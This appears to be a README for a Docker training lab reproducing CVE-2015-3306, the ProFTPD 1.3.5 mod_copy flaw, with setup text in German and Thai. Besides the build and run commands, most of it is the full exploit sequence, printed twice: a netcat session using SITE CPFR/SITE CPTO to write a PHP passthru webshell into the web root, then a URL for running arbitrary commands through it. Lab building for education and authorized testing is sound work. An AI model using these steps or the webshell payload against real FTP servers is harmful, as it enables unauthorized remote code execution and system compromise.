
CVE-2015-3306 – ProFTPD – RCE Heim-Labor-Einrichtung (Docker) einfach zu verwenden für Red Teaming oder Penetration Testing
Lab นี้ถูกออกแบบเพื่อจำลองช่องโหว่ CVE-2015-3306 — ProFTPD mod_copy Remote File Copy to RCE
ใช้สำหรับเรียนรู้ Web Shell Injection RCE ผ่านโมดูล mod_copy ของ ProFTPD
mod_copy เต็มรูปแบบ (SITE CPFR / SITE CPTO)/var/www/htmlflag_RANDOM.txt/etc/proftpd/proftpd.conf
/usr/local/proftpd/
/var/www/html/
/tmp/flag_xxx.txt
/entrypoint.sh
docker build -t sentinel7-proftpd-lab .
docker run -it --rm -p 21:21 -p 80:80 sentinel7-proftpd-lab
nc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php
Im Browser öffnen:
http://<IP>/webshell.php?cmd=<command>
Gespeichert unter:
/tmp/flag_RANDOM.txt
Dieses Labor simuliert CVE-2015-3306 mit ProFTPD 1.3.5 und mod_copy, was Angreifern ermöglicht, eine ProFTPD mod_copy Remote File Copy to RCE durchzuführen.
mod_copy aktiviert (SITE CPFR + SITE CPTO)flag_RANDOM.txt beim Container-Startnc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php
Dann ausführen:
http://<IP>/webshell.php?cmd=<command>
/tmp/flag_RANDOM.txt
Nur für Bildungszwecke und autorisierte Penetrationstests.